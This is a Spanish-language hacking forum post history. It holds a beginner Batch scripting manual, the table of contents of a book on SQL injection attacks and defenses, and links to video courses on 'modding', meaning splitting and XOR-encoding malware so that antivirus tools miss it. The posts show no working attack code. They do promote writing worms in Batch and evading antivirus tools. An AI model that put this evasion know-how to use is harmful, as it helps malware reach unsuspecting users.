modificar el code, con parametros, recuerda usar "/?" (sin comillas) para darte una
idea. El troyano no lo explicare en este manual dado que este es un manual basico.
Creo que ha sido todo lo "basico", es posible que haga otros manuales "medio"
"medio-avanzado" y "avanzado", pero todo a su tiempo, como ya me conoceran algunos, otros no es que no suelo poner cosas conocidas en mis manuales, no he hecho de batch pero de otras cosas si, bien sin mas decirles que seguire con estos manuales, el siguiente sera algo mas de nivel 'medio' y espero les haya gustado las 2 partes de este querido manual. Cualquier duda, propuesta, critica o comentario pues ya saben no duden en hacerla.
Me Despido:
:__ 2Fac3R__:

Manual Nivel Medio --> http://www.hackxcrack.es/batch/5043-manual-batch-nivel-medio-2fac3r.html

EN PDF

PRIMERO --> http://www.multiupload.com/HDQD1WUKVV
2DA PARTE --> http://www.multiupload.com/6MEG25RG5U
NIVEL MEDIO --> http://www.multiupload.com/UFE74WZ1JW
24  Programación / Scripting / Manual Batch desde -1 (By 2Fac3R) en: 20 Octubre 2011, 22:24 pm
Hola gente hoy vengo a colgar mi pequeño manual super sencillo para los novatos en Batch y que quieran conocer mas el lenguaje. Puede que digas “¿Por qué
“otro”manual desde 0 si ya hay cientos en la red”?, pues mi respuesta es la
siguiente:
Dado que existen muchisimos manuales de Batch (ultimamente el de Alan++) que explican el Batch, he decidido hacerme uno 'diferente', digo eso porque no explicare ciertas cosas que otros manuales si lo hacen, bueno me canse xD, leancelo y veran porque 'Diferente'.

Citar
-Ya deja de hablar y ve al grano-
ok ya voy.
Dado mi discurso, empiezo:

¿Bien y que es Batch?
Bueno, es sencillo es un lenguaje de programación de scripting ( o sea, que no necesita compilación para probarlo, si quieres una definición mejor busca en Google), este lenguaje muchos dicen que no es potente, y en parte tienen razón y en partes no, me explico, todo depende de la imaginación que tenga uno para hacer sus codes, bueno la parte verdadera es que con Batch no se puede hacer por ejemplo un Sistema Operativo ( es u ejemplo exagerado, pero sirve como ejemplo, xd) o tampoco es posible crear un Keylogger, por ejemplo, pero si se pueden hacer muchas cosas como; troyano, worm o cualquier tipo de Malware (Claro que no sera igual a uno creado en “C” por ejemplo), pero es muy utli y nos puede servir para varias cosas.
¿Y como que podemos hacer en Batch?
Bueno como ya he dicho se pueden hacer cientos de cosas pero depende de tu
imaginación, como por ejemplo, podemos hacer desde agendas, calculadoras, virus,
etc. Todo depende de tu imaginación y de lo que quieras hacer en Batch?

[SIZE="3"]OTRAS COSAS:[/SIZE]
Primero que nada no me hago responsable del mal uso que este manual pueda llegar
a dar ideas, xd. Otra cosa es que recuerda que Batch es “simple” a que me refiero?,
bueno me refiero  a que no puedes hacer de batch muchas cosas que se pueden hacer
en otros lenguajes de programación como; C, Python, Perl, Pascal, etc. Otra cosa
este manual esta hecho para el aprendizaje por lo tanto, no voy a mostrar el "super
paso a paso" de como se hagan las cosas, si no explico algo es para que te enseñes
a buscar en google o se te quite la verguenza de preguntar a un colega que sepa del
tema, disculpen si esto es latoso pero es necesario para el aprendizaje.

Citar
-Ya me estas aburriendo ve al grano-
Ya ya voy, xd.
Empecemos:

¿
COMO HAGO UN PROGRAMA EN BATCH?
Bueno aquí vamos a necesitar el block de notas, y una mente abierta, abrimos el
block de notas 

La estructura de Batch es la siguiente:
Código:
Código:
@echo off 
<comandos>
Exit
Empecemos por describirlos el “echo off” sirve para que no se muestren los
comandos que nosotros ponemos y el “@” sirve para que no se muestre ese echo off,
“<comandos> es aquí donde van los comandos que vamos a teclear, y “exit” es el
comando para salir del archivo por lotes.

Vamos a un ejemplo muy conocido escribamos:
Código:
Código:
@echo off
Echo “Hola mundo”
Exit
el "echo" se usa para mostrar algo en pantalla.
Guárdalo con extensión “.bat” (o sea, guardar como  --> holamundo.bat) y ejecútalo.

Citar
--Que coño a pasado solo salio una ventanita negra muy rápido desaparecio, me
estas viendo el pelo o que?--
  No, no tranquilo, eso lo hice a propósito para
explicarte otro comando que es el “pause”.
Ahora da click derecho sobre “holamundo.bat” y elige “editar”, bueno nos salio la
ventanita de Block de notas, bien ahora escribe el siguiente code:

Código:
Código:
@echo off
Echo Hola mundo
Pause
Exit

Citar
-¿Que ha pasado ahora si mostro el "hola mundo"?-
Como ya dije antes el "pause"
pausa o detiene (xD) los comandos hasta que teclees una tecla, xD.

Bien vamos muy bien, este es el ejemplo que se usa al inicio de todo lenguaje de
programacion. Como ya dije ocupas una mente curiosa y te doy una ayudadita para
conseguir mas informacion de un comando usamos un parametro (-que es un parametro-)
(no te voy a hacerlo facil busca en Google) el cual es "/?" (sin comillas) por
ejemplo abre la shell de windows (inicio-->ejecutar-->cmd-->enter) y escribe "echo
/?" y da enter.

Te ha salido esto?:
Código:
Código:
Muestra mensajes o activa y desactiva el eco del comando.

  ECHO [ON | OFF]
  ECHO [mensaje]

Escriba ECHO sin par metros para mostrar la configuraci¢n actual del eco.
Pues bien eso es lo que hace el comando "echo", son diferentes cosas, vdd?.

Citar
-Ahh se me ah ocurrido una idea, voy a ver que hace los comandos "exit" y
"pause" que me has enseñado-


Perfecto si eres de los que piensan asi, eso te ayudara mucho en un futuro,
entonces ahora teclea "exit /?" y/o "pause /?".

Bueno, sigamos, espero que hayas entendido mas o menos lo que es un comando, sino
ya sabes que existe Google (yo recomiendo Google pero puedes buscar en tu buscador
favorito ya sea "Altavista", "Yahoo", etc)
-Todo esto se me hace bien pero no me gusta la ventanita negra para mis futuros
programas- Para ello tenemos el comando "Color" usa un poco de imaginacion y esto
te lo dejo a ti. (¿una pista? "/?").
Quieres conocer todos los comandos (o la mayoria) que existen en MS-dos (Batch)?
Pues entonces teclea en la shell "help" y mira los comandos. Te ha salido esto:
Código:

"Para obtener mas informaci¢n acerca de un comando especifico, escriba HELP
seguido del nombre de comando

Código:
[code]ASSOC    Muestra o modifica las asociaciones de las extensiones de archivos.
AT       Planifica comandos y programas para ejecutarse en un equipo.
ATTRIB   Muestra o cambia los atributos del archivo.
BREAK    Establece o elimina la comprobaci¢n extendida de Ctrl+C.
CALCS    Muestra o modifica las listas de control de acceso (ACLs) de archivos.
CALL     Llama a un programa por lotes desde otro.
CD       Muestra el nombre del directorio actual o cambia a otro directorio.
CHCP     Muestra o establece el n£mero de p gina de c¢digos activa.
CHDIR    Muestra el nombre del directorio actual o cambia a otro directorio.
CHKDSK   Comprueba un disco y muestra un informe de su estado.
CHKNTFS  Muestra o modifica la comprobaci¢n de disco al iniciar.
CLS      Borra la pantalla.
CMD      Inicia una nueva instancia del int‚rprete de comandos de Windows
COLOR    Establece los colores de primer plano y fondo predeterminados de la
         consola.
COMP     Compara el contenido de dos archivos o un conjunto de archivos.
COMPACT  Muestra o cambia el estado de compresi¢n de archivos en particiones
         NTFS.
CONVERT  Convierte vol£menes FAT a vol£menes NTFS. No puede convertir
         la unidad actual.
COPY     Copia uno o m s archivos a otro lugar.
DATE     Muestra o establece la fecha.
DEL      Elimina uno o m s archivos.
DIR      Muestra una lista de archivos y subdirectorios en un directorio.
DISKCOMP Compara el contenido de dos disquetes.
DISKCOPY Copia el contenido de un disquete en otro.
DOSKEY   Edita l¡neas de comando, memoriza comandos y crea macros.
ECHO     Muestra mensajes, o activa y desactiva el eco.
ENDLOCAL Termina la b£squeda de variables de entorno del archivo por lotes.
ERASE    Elimina uno o m s archivos.
EXIT     Sale del programa CMD.EXE (interfaz de comandos).
FC       Compara dos archivos o conjunto de archivos y muestra las diferencias
         entre ellos.
FIND     Busca una cadena de texto en uno o m s archivos.
FINDSTR  Busca cadenas de texto en archivos.
FOR      Ejecuta un comando para cada archivo en un conjunto de archivos.
FORMAT   Da formato a un disco para usarse con Windows.
FTYPE    Muestra o modifica los tipos de archivo utilizados en una asociaci¢n
         de archivos.
GOTO     Direcciona el int‚rprete de comandos de Windows a una l¡nea en
         un programa por lotes.
GRAFTABL Permite a Windows mostrar un conjunto de caracteres extendidos
         en modo gr fico.
HELP     Proporciona informaci¢n de ayuda para los comandos de Windows.
IF       Ejecuta procesos condicionales en programas por lotes.
LABEL    Crea, cambia o elimina la etiqueta del volumen de un disco.
MD       Crea un directorio.
MKDIR    Crea un directorio.
MODE     Configura un dispositivo de sistema.
MORE     Muestra la informaci¢n pantalla por pantalla.
MOVE     Mueve uno o m s archivos de un directorio a otro en la misma unidad.
PATH     Muestra o establece una ruta de b£squeda para archivos ejecutables.
PAUSE    Suspende el proceso de un archivo por lotes y muestra un mensaje.
POPD     Restaura el valor anterior del directorio actual guardado por PUSHD.
PRINT    Imprime un archivo de texto.
PROMPT   Cambia el s¡mbolo de comandos de Windows.
PUSHD    Guarda el directorio actual y despu‚s lo cambia.
RD       Elimina un directorio.
RECOVER  Recupera la informaci¢n legible de un disco da¤ado o defectuoso.
REM      Graba comentarios en archivos por lotes o CONFIG.SYS.
REN      Cambia el nombre de uno o m s archivos.
RENAME   Cambia el nombre de uno o m s archivos.
REPLACE  Reemplaza archivos.
RMDIR    Elimina un directorio.
SET      Muestra, establece o elimina variables de entorno de Windows.
SETLOCAL Inicia la localizaci¢n de cambios del entorno en un archivo por lotes.
SHIFT    Cambia posici¢n de modificadores reemplazables en archivos por lotes.
SORT     Ordena las entradas.
START    Inicia otra ventana para ejecutar un programa o comando.
SUBST    Asocia una ruta de acceso con una letra de unidad.
TIME     Muestra o establece la hora del sistema.
TITLE    Establece el t¡tulo de la ventana de una sesi¢n de CMD.EXE.
TREE     Muestra gr ficamente la estructura de directorios de una unidad o
         ruta de acceso.
TYPE     Muestra el contenido de un archivo de texto.
VER      Muestra la versi¢n de Windows.
VERIFY   Comunica a Windows si debe comprobar que los archivos se escriben
         de forma correcta en un disco.
VOL      Muestra la etiqueta del volumen y el n£mero de serie del disco.
XCOPY    Copia archivos y  rboles de directorios."
Citar
-¿Que, eres brujo o adivino?-
No, no lo soy,xD

Usa un poco de imaginacion para los comandos que no se vayan a explicar aqui.
Vamos a unos ejemplos de algunos comandos, usaremos como ejemplo el comando "start"
vamos:

Código:
Código:
@echo off
start [url=http://www.google.com]www.google.com[/url]
pause>nul
exit

Citar
-Que coño has hecho porque escribes "pause>nul" si me habias dicho que era solo
"pause"-
Bueno ese es un parametro de "pause" pero no solo de pause se un poco
curioso y prueba.
Citar
-No M@m3$ ya no explicas nada-
ok, ok el ">nul" sirve para que no se muestre el
comando es como "@echo off" pero solo para cierto comando, te has fijado que al
ejecutar el codigo no te aparece el "presione una tecla para continuar" pero si
tienes que presionar una tecla para continuar y ha abierto el explorador por
defecto que tengas ya sea el iexplorer, mozilla, chrome, etc. Bueno este es un
ejemplo del comando "start" como su nombre lo indica "inicia" algo. Vamos a otro
ejemplo, supongamos que queremos que nuestro programa haga que muestre "se va a
abrir el internet explorer" y que lo habra, ¿Como lo hariamos?.
Vamos a la practica:
Hagamos un algorito (un algoritmo es una serie de procedimiento que seguira en este
caso nuestro programa).
ALGORITMO:

Código:
1: Que no muestre los comandos (@echo off)
2: Que nos muestre "Se va a abrir el internet explorer" (echo ...)
3: Abrir el internet explorer (start...)
4: Pausar nuestro programa (pause | pause>nul)
5: Que se cierre.

Bien, vamos a hacer nuestro programa: (usare "#" para poner comentarios o cadenas")

Código:
Código:
@echo off #Vemos que es la "1" de nuestro algoritmo
echo Se va a abrir el internet explorer # 2 de nuestro algoritmo
start iexplorer #3 de nuestro algoritmo.
pause>nul #4
exit #5

Citar
-No sirve!!!-
Me lo temia, puede que no sirva por varias cosas, una de ellas seria
que el internet explorer no este en el escritorio, otra seria que el nombre del ie
no es "iexplorer" sino "internetexplorer", otra logica seria que no tengas el
navegador (como yo,xd)
Prueba con otros programas.
Ten en cuenta que no se pone ".exe" ".txt" ni ".com" son las unicas excepciones
que nos da ms-dos. para otras extensiones de archivos se tendra que poner su
extensión. Vamos a otras cosas, explicare los comandos mas basicos que existen
"md", "rd", del,etc. "md" sirve para crear un directorio como nos dijò "help"
su sintaxis es:

Código:
MD [unidad:]ruta

vamos a crear una carpeta:

Código:
Código:
@echo off
md "nombre_de_carpeta"
pause>nul
exit
y nos ha creado una carpeta en el sitio actual donde esta el batch.
Citar
-Se me a ocurrido algo pero no se si se pueda, crear una carpeta en el disco local-
Si se puede aunque no este el batch en el directorio, para ello la sintaxis nos
pide unidad y ruta.
vamos a crear una carpeta con una subcarpeta llamada "b" en la carpeta "a"en el
disco duro llamado "C:"
Para ello hacemos esto:

Código:
Código:
@echo off
md c:\a\b
pause>nul
exit

Citar
-Pero que hago si mi disco no se llama "c:"-
pues tienes 2 opciones;
1.- simplemente cambiar el nombre por el que tu tengas
2.- Usar una variable de entorno

VARIABLES DE ENTORNO:

Las variables de entorno nos sirve para que en vez de escribir toda la ruta solo
escribamos la variable de entorno y nos sirve para lo mismo (xd, ni yo me entendi,
por eso vamos a la practica para que me entiendas mejor).

En este caso voy a explicar en el ejemplo de "md", suponemos que no tienes tu hd
con el nombre de c:/ sino con x:/ y tu amigo tiene su hd con el nombre f:/ y quieres
que tu programa de crear carpetas sirva tanto en tu pc como en la de tu amigo pepe
Te encuentras con el problema de que si pones:

Código:
Código:
@echo off
md x:\a\b\b1\ck
pause>nul
exit

en tu pc funciona, pero al mandarlo a tu amigo pepe, no le funciona porque el tiene
su hd llamado f: y tu pusiste "x:\", bien para ello utilizaremos una variable de
entorno la cual en este caso es: %homedrive%\, ahora vamos a ver nuestro code:

Código:
Código:
@echo off
md %homedrive%\a\b\b1\ck
pause>nul
exit

¿Que ha pasado?
Pues es simple la variable de entorno guarda el directorio por defecto de el hd.
ahora manda a tu amigo pepe y veras que le funciona
Vamos a poner otro ejemplo de variable de entorno.
Supongamos que quieres borrar una carpeta que hiciste en la subcarpeta de windows
llamada "system32" que tiene otra subcarpeta llamada "1028" la cual se llama prueba
para ello para crearla tuviste que hacer lo siguiente:

Código:
Código:
@echo off
md %homedrive%\WINDOWS\system32\1028\prueba
exit

y para borrala haces esto:

Código:
Código:
@echo off
rd %homedrive%\WINDOWS\system32\1028\prueba
exit

Pues te la haz complicado muchisimo, para borrarla con las variables de entorno
seria asi:

Código:
Código:
@echo off
md %windir%\system32\1028\prueba
exit

y para borrarla:

Código:
Código:
@echo off
rd %windir%\system32\1028\prueba
exit

Espero que hayas entendido lo de las variables de entorno, te pongo las que conozco:

Código:
Windows= %windir% 1 | %systemroot%
Archivos de Programa= %programfiles%
Archivos temporales= %TEMP% y %TMP%
Disco Local= %homedrive% | %SYSTEMDRIVE%
Carpeta de User= %userprofile% | %homepath%
Datos de programa = %APPDATA%
Bien explicado esto espero que sea facil el siguiente texto; el cual es sobre las
variables.
[SIZE="4"]Empecemos[/SIZE].- Las variables se escriben entre signos de porcentajes ejemplo.-
%variable%. Una variable como su nombre lo dice varia segun el dato que se le de
por lo general son numeros por ejemplo al hacer una calculadora o en la mayoria de
los programas porque es la forma mas facil para que no haya problemas cuando el
usuario eliga. como no se explicarme -ah en serio?- vamos a la p`practica y a los
ejemplos:

Vamos a poner un ejemplo del archirequetereconocido "Hola %nombre"

Algoritmo sintetizado:

1.- Que nos pregunte nuestro nombre
2.- Que el nombre se guarde en una variable llamada "nombre"
3.- Que nos muestre nuestro nombre
4.- Fin

Vamos a codear
-Pero como lo hago si no me has explicado como guardar el nombre en la variable-
Bueno como ya sabes no soy bueno para explicarme asi que voy directo al ejemplo:

Código:
Código:
@echo off
echo ¿Cual es tu nombre?
set /p nombre=
cls
echo ¿Cual es tu apellido?
set /p apellido=
cls
echo ya te reconoci %nombre% %apellido%
echo adios
pause>nul
exit
Que es lo que hizo nuestro programa?, bueno primero que nada nos pregunta cual es
nuestro nombre y al teclear nuestro nombre lo guarda en la variable "nombre" con
el comando set /p y limpia la pantalla con el comando "cls", despues nos pregunta
nuestro apellido y lo guarda en la variable "apellido", limpia la pantalla y nos
dice ya te reconoci %nombre% (muestra lo que pusimos en "¿Cual es tu nombre?")
%apellido% (muestra lo que guardamos en "Cual es tu apellido?"), y nos dice adios
y se cierra el bat.

Aqui termina la primera parte de este manual hecho por mi 2Fac3R. Dudas, sugerencias o criticas opinen, tengan en cuenta que estoy enseñando lo basico para que se entienda sabemos que muchas cosas que aqui estan se pueden hacer con menos lineas, aqui hable poco realmente de lo que es batch, en la siguiente parte me basare mas en la practica y no en la teoria, haremos una calculadora, un bucle, worm y quiza mas cosas. Por mientras trata de estudiar los comandos que vimos en "help".

Zalu2


EN PDF:

PRIMERO --> http://www.multiupload.com/HDQD1WUKVV
2DA PARTE --> http://www.multiupload.com/6MEG25RG5U
NIVEL MEDIO --> http://www.multiupload.com/UFE74WZ1JW[/code]
25  Seguridad Informática / Nivel Web / SQL Injection Attacks and Defense (PDF) en: 19 Octubre 2011, 22:53 pm
Un manual muy completo de Ataques y defensa de las SQLi:

CONTENIDO:
Citar
Chapter 1 What Is SQL Injection?. 1
Introduction . 2
Understanding How Web Applications Work. 2
A Simple Application Architecture. 4
A More Complex Architecture. 5
Understanding SQL Injection. 6
High-Profile Examples. 10
Understanding How It Happens. 13
Dynamic String Building . 13
Incorrectly Handled Escape Characters. 14
Incorrectly Handled Types . 15
Incorrectly Handled Query Assembly. 17
Incorrectly Handled Errors. 18
Incorrectly Handled Multiple Submissions . 19
Insecure Database Configuration. 21
Summary. 24
Solutions Fast Track. 24
Frequently Asked Questions. 26
Chapter 2 Testing for SQL Injection. 29
Introduction . 30
Finding SQL Injection. 30
Testing by Inference. 31
Identifying Data Entry. 31
GET Requests . 31
POST Requests . 32
Other Injectable Data . 35
Manipulating Parameters . 36
Information Workf low. 39
Database Errors . 40
Commonly Displayed SQL Errors . 41
Microsoft SQL Server Errors. 41
MySQL Errors . 46
Oracle Errors . 49
ix
More free ebooks : http://fast-file.blogspot.com
x Contents
Application Response. 51
Generic Errors. 51
HTTP Code Errors. 54
Different Response Sizes . 55
Blind Injection Detection. 56
Confirming SQL Injection. 60
Differentiating Numbers and Strings. 61
Inline SQL Injection . 62
Injecting Strings Inline. 62
Injecting Numeric Values Inline. 65
Terminating SQL Injection. 68
Database Comment Syntax. 69
Using Comments. 70
Executing Multiple Statements. 74
Time Delays. 79
Automating SQL Injection Discovery. 80
Tools for Automatically Finding SQL Injection . 81
HP WebInspect . 81
IBM Rational AppScan . 83
HP Scrawlr. 85
SQLiX . 87
Paros Proxy. 88
Summary. 91
Solutions Fast Track. 91
Frequently Asked Questions. 93
Chapter 3 Reviewing Code for SQL Injection . 95
Introduction . 96
Reviewing Source Code for SQL Injection. 96
Dangerous Coding Behaviors . 98
Dangerous Functions . 105
Following the Data. 109
Following Data in PHP. 110
Following Data in Java. 114
Following Data in C#. 115
Reviewing PL/SQL and T-SQL Code. 117
Automated Source Code Review. 124
Yet Another Source Code Analyzer (YASCA) . 125
Pixy. 126
AppCodeScan . 127
More free ebooks : http://fast-file.blogspot.com
Contents xi
LAPSE. 127
Security Compass Web Application Analysis Tool (SWAAT). 128
Microsoft Source Code Analyzer for SQL Injection. 128
Microsoft Code Analysis Tool .NET (CAT.NET). 129
Commercial Source Code Review Tools. 129
Ounce. 131
Source Code Analysis. 131
CodeSecure. 132
Summary. 133
Solutions Fast Track. 133
Frequently Asked Questions. 135
Chapter 4 Exploiting SQL Injection . 137
Introduction . 138
Understanding Common Exploit Techniques. 139
Using Stacked Queries. 141
Identifying the Database. 142
Non-Blind Fingerprint. 142
Banner Grabbing. 144
Blind Fingerprint. 146
Extracting Data through UNION Statements. 148
Matching Columns. 149
Matching Data Types . 151
Using Conditional Statements. 156
Approach 1: Time-based. 157
Approach 2: Error-based. 159
Approach 3: Content-based. 161
Working with Strings. 161
Extending the Attack . 163
Using Errors for SQL Injection. 164
Error Messages in Oracle . 167
Enumerating the Database Schema. 170
SQL Server . 171
MySQL. 177
Oracle. 180
Escalating Privileges. 183
SQL Server . 184
Privilege Escalation on Unpatched Servers . 189
Oracle. 190
More free ebooks : http://fast-file.blogspot.com
xii Contents
Stealing the Password Hashes . 192
SQL Server . 192
MySQL. 194
Oracle. 194
Oracle Components. 196
APEX. 196
Oracle Internet Directory . 197
Out-of-Band Communication . 198
E-mail. 199
Microsoft SQL Server . 199
Oracle. 202
HTTP/DNS. 203
File System. 203
SQL Server. 204
MySQL. 207
Oracle. 208
Automating SQL Injection Exploitation. 208
Sqlmap. 208
Sqlmap Example . 209
Bobcat. 211
BSQL . 212
Other Tools . 214
Summary. 215
Solutions Fast Track. 215
Frequently Asked Questions. 218
Chapter 5 Blind SQL Injection Exploitation. 219
Introduction . 220
Finding and Confirming Blind SQL Injection. 221
Forcing Generic Errors. 221
Injecting Queries with Side Effects. 222
Spitting and Balancing . 222
Common Blind SQL Injection Scenarios . 225
Blind SQL Injection Techniques. 225
Inference Techniques. 226
Increasing the Complexity of Inference Techniques. 230
Alternative Channel Techniques. 234
Using Time-Based Techniques. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
Delaying Database Queries. 235
MySQL Delays . 235
More free ebooks : http://fast-file.blogspot.com
Contents xiii
Generic MySQL Binary Search Inference Exploits . 237
Generic MySQL Bit-by-Bit Inference Exploits. 237
SQL Server Delays. 238
Generic SQL Server Binary Search Inference Exploits. 240
Generic SQL Server Bit-by-Bit Inference Exploits . 240
Oracle Delays . 240
Time-Based Inference Considerations. 241
Using Response-Based Techniques. 242
MySQL Response Techniques. 242
SQL Server Response Techniques. 244
Oracle Response Techniques. 246
Returning More Than One Bit of Information. 247
Using Alternative Channels. 249
Database Connections. 250
DNS Exfiltration . 251
E-mail Exfiltration. 255
HTTP Exfiltration. 256
Automating Blind SQL Injection Exploitation. 258
Absinthe . 258
BSQL Hacker . 260
SQLBrute . 263
Sqlninja. 264
Squeeza. 265
Summary. 267
Solutions Fast Track. 267
Frequently Asked Questions. 270
Chapter 6 Exploiting the Operating System. 271
Introduction . 272
Accessing the File System. 273
Reading Files. 273
MySQL. 274
Microsoft SQL Server . 280
Oracle. 289
Writing Files . 291
MySQL. 292
Microsoft SQL Server . 295
Oracle. 300
Executing Operating System Commands. 301
Direct Execution . 301
More free ebooks : http://fast-file.blogspot.com
xiv Contents
Oracle. 301
DBMS_SCHEDULER. 302
PL/SQL Native. 302
Other Possibilities. 303
Alter System Set Events. 303
PL/SQL Native 9i. 303
Buffer Overflows. 304
Custom Application Code. 304
MySQL. 304
Microsoft SQL Server . 305
Consolidating Access . 309
Summary. 312
Solutions Fast Track. 312
Frequently Asked Questions. 314
Endnotes. 315
Chapter 7 Advanced Topics . 317
Introduction . 318
Evading Input Filters . 318
Using Case Variation. 319
Using SQL Comments. 319
Using URL Encoding . 320
Using Dynamic Query Execution. 322
Using Null Bytes. 323
Nesting Stripped Expressions . 324
Exploiting Truncation. 324
Bypassing Custom Filters . 326
Using Non-Standard Entry Points. 327
Exploiting Second-Order SQL Injection. 329
Finding Second-Order Vulnerabilities. 332
Using Hybrid Attacks. 335
Leveraging Captured Data. 335
Creating Cross-Site Scripting . 335
Running Operating System Commands on Oracle . 336
Exploiting Authenticated Vulnerabilities. 337
Summary. 338
Solutions Fast Track. 338
Frequently Asked Questions. 340
More free ebooks : http://fast-file.blogspot.com
Contents xv
Chapter 8 Code-Level Defenses. 341
Introduction . 342
Using Parameterized Statements. 342
Parameterized Statements in Java. 344
Parameterized Statements in .NET (C#). 345
Parameterized Statements in PHP. 347
Parameterized Statements in PL/SQL. 348
Validating Input. 349
Whitelisting. 349
Blacklisting. 351
Validating Input in Java. 353
Validating Input in .NET. 354
Validating Input in PHP. 354
Encoding Output. 355
Encoding to the Database. 355
Encoding for Oracle . 356
Oracle dbms_assert. 357
Encoding for Microsoft SQL Server. 359
Encoding for MySQL. 360
Canonicalization . 362
Canonicalization Approaches. 363
Working with Unicode . 364
Designing to Avoid the Dangers of SQL Injection. 365
Using Stored Procedures. 366
Using Abstraction Layers. 367
Handling Sensitive Data. 368
Avoiding Obvious Object Names. 369
Setting Up Database Honeypots . 370
Additional Secure Development Resources. 371
Summary. 373
Solutions Fast Track. 373
Frequently Asked Questions. 375
Chapter 9 Platform-Level Defenses. 377
Introduction . 378
Using Runtime Protection. 378
Web Application Firewalls. 379
Using ModSecurity. 380
Configurable Rule Set. 380
Request Coverage. 383
More free ebooks : http://fast-file.blogspot.com
xvi Contents
Request Normalization. 383
Response Analysis. 384
Intrusion Detection Capabilities. 385
Intercepting Filters. 386
Web Server Filters. 386
Application Filters. 389
Implementing the Filter Pattern in Scripted Languages . 390
Filtering Web Service Messages. 391
Non-Editable versus Editable Input Protection. 391
URL/Page-Level Strategies. 392
Page Overriding . 392
URL Rewriting . 393
Resource Proxying/Wrapping . 393
Aspect-Oriented Programming (AOP) . 393
Application Intrusion Detection Systems (IDSs). 394
Database Firewall. 394
Securing the Database . 395
Locking Down the Application Data. 395
Use the Least-Privileged Database Login. 395
Revoke PUBLIC Permissions. 396
Use Stored Procedures. 396
Use Strong Cryptography to Protect Stored Sensitive Data . 397
Maintaining an Audit Trail. 398
Oracle Error Triggers. 398
Locking Down the Database Server. 400
Additional Lockdown of System Objects. . . . . . . . . . . . . . . . . . . . . . . . 400
Restrict Ad Hoc Querying. 401
Strengthen Controls Surrounding Authentication . 401
Run in the Context of the Least-Privileged
Operating System Account . 401
Ensure That the Database Server Software Is Patched. 402
Additional Deployment Considerations. 403
Minimize Unnecessary Information Leakage. 403
Suppress Error Messages. 403
Use an Empty Default Web Site. 406
Use Dummy Host Names for Reverse DNS Lookups. 406
Use Wildcard SSL Certificates . 407
Limit Discovery via Search Engine Hacking. 407
Disable Web Services Description Language
(WSDL) Information. 408
More free ebooks : http://fast-file.blogspot.com
Contents xvii
Increase the Verbosity of Web Server Logs . 409
Deploy the Web and Database Servers on Separate Hosts. 409
Configure Network Access Control. 409
Summary. 410
Solutions Fast Track. 410
Frequently Asked Questions. 412
Chapter 10 References. 415
Introduction . 416
Structured Query Language (SQL) Primer. 416
SQL Queries. 416
SELECT Statement. 417
UNION Operator. 417
INSERT Statement. 418
UPDATE Statement. 418
DELETE Statement. 418
DROP Statement . 420
CREATE TABLE Statement . 420
ALTER TABLE Statement. 420
GROUP BY Statement. 421
ORDER BY Clause. 421
Limiting the Result Set . 421
SQL Injection Quick Reference. 422
Identifying the Database Platform. 422
Identifying the Database Platform via Time Delay Inference . 423
Identifying the Database Platform via SQL Dialect Inference. 423
Combining Multiple Rows into a Single Row. 424
Microsoft SQL Server Cheat Sheet. 425
Enumerating Database Configuration
Information and Schema. 425
Blind SQL Injection Functions: Microsoft SQL Server . 427
Microsoft SQL Server Privilege Escalation . 427
OPENROWSET Reauthentication Attack. 428
Attacking the Database Server: Microsoft SQL Server. 429
System Command Execution via xp_cmdshell . 429
xp_cmdshell Alternative. 430
Cracking Database Passwords. 430
Microsoft SQL Server 2005 Hashes . 431
File Read/Write. 431
More free ebooks : http://fast-file.blogspot.com
xviii Contents
MySQL Cheat Sheet . 431
Enumerating Database Configuration Information
and Schema . 431
Blind SQL Injection Functions: MySQL. 432
Attacking the Database Server: MySQL . 433
System Command Execution. 433
Cracking Database Passwords. 434
Attacking the Database Directly. 434
File Read/Write. 434
Oracle Cheat Sheet . 435
Enumerating Database Configuration Information
and Schema . 435
Blind SQL Injection Functions: Oracle. 436
Attacking the Database Server: Oracle. 437
Command Execution . 437
Reading Local Files. 437
Reading Local Files (PL/SQL Injection Only) . 438
Writing Local Files (PL/SQL Injection Only). 439
Cracking Database Passwords. 440
Bypassing Input Validation Filters . 440
Quote Filters. 440
HTTP Encoding . 442
Troubleshooting SQL Injection Attacks. 443
SQL Injection on Other Platforms. 446
PostgreSQL Cheat Sheet. 446
Enumerating Database Configuration Information
and Schema . 447
Blind SQL Injection Functions: PostgreSQL. 448
Attacking the Database Server: PostgreSQL. 448
System Command Execution. 448
Local File Access. 449
Cracking Database Passwords. 449
DB2 Cheat Sheet. 449
Enumerating Database Configuration Information
and Schema . 449
Blind SQL Injection Functions: DB2. 450
Informix Cheat Sheet. 451
Enumerating Database Configuration Information
and Schema . 451
Blind SQL Injection Functions: Informix. 452
More free ebooks : http://fast-file.blogspot.com
Contents xix
Ingres Cheat Sheet. 452
Enumerating Database Configuration Information
and Schema . 452
Blind SQL Injection Functions: Ingres . 453
Microsoft Access. 453
Resources . 453
SQL Injection White Papers. 453
SQL Injection Cheat Sheets. 454
SQL Injection Exploit Tools. 454
Password Cracking Tools. 455
Solutions Fast Track. 456
Index. 459

DESCARGAR -- > http://www.multiupload.com/E5REDO8VFI
26  Seguridad Informática / Análisis y Diseño de Malware / Entendiendo y aplicando DSPlit (By 2Fac3R) en: 16 Septiembre 2011, 20:46 pm
Hola amigos, les traigo un video-tuto mas, ahora en este les explico como hacer y como funciona el Dsplit, que como muchos sabemos es el que nos ayuda a sacar mas de 1 firma, espero les guste.

Detalles del video:

Video ".exe" (Hecho con SCREEN2EXE, muy bueno para hacer los videos)
Peso: 6.6 MB
Duracion: 12:24 Min

Link de Descarga: http://www.multiupload.com/GNI3TFCSAS

Nota: El video esta orientado a los mas nuevos en el tema, no esperen mucho solo es Dsplit (con Hex), su explicacion, su uso y como funciona.
Zalu2
27  Seguridad Informática / Análisis y Diseño de Malware / Curso de Modding Para Newbies (By Decoder79 & RocKeG) en: 16 Septiembre 2011, 20:41 pm
Ya que le colabore a mi amigo Decoder79 he decidido postear el curso completo por aca para que lo puedan seguir de forma mas completa, asi que a estudiar se ha dicho!

Primer Video:

Desde lo mas basico...

Descargar --> http://www.multiupload.com/6B83VV4JRM

Segundo Video:

Se explica el uso del DSplit

Descargar --> http://www.multiupload.com/7YUMNVM4IL

Tercera entrega:

El uso del RIT:

http://breaksecurity.blogspot.com/2011/09/curso-modding-para-newbies-ed3-by.html

Cuarta entrega:

Se explica el Metodo XOR:

Aquí os dejo el código utilizado en el videotutorial
http://www.multiupload.com/VFPYWI9E6I

Aquí os dejo el vídeo
http://www.multiupload.com/N1EY08FHOD

Espero le den buen uso, a joder a los Avs!.
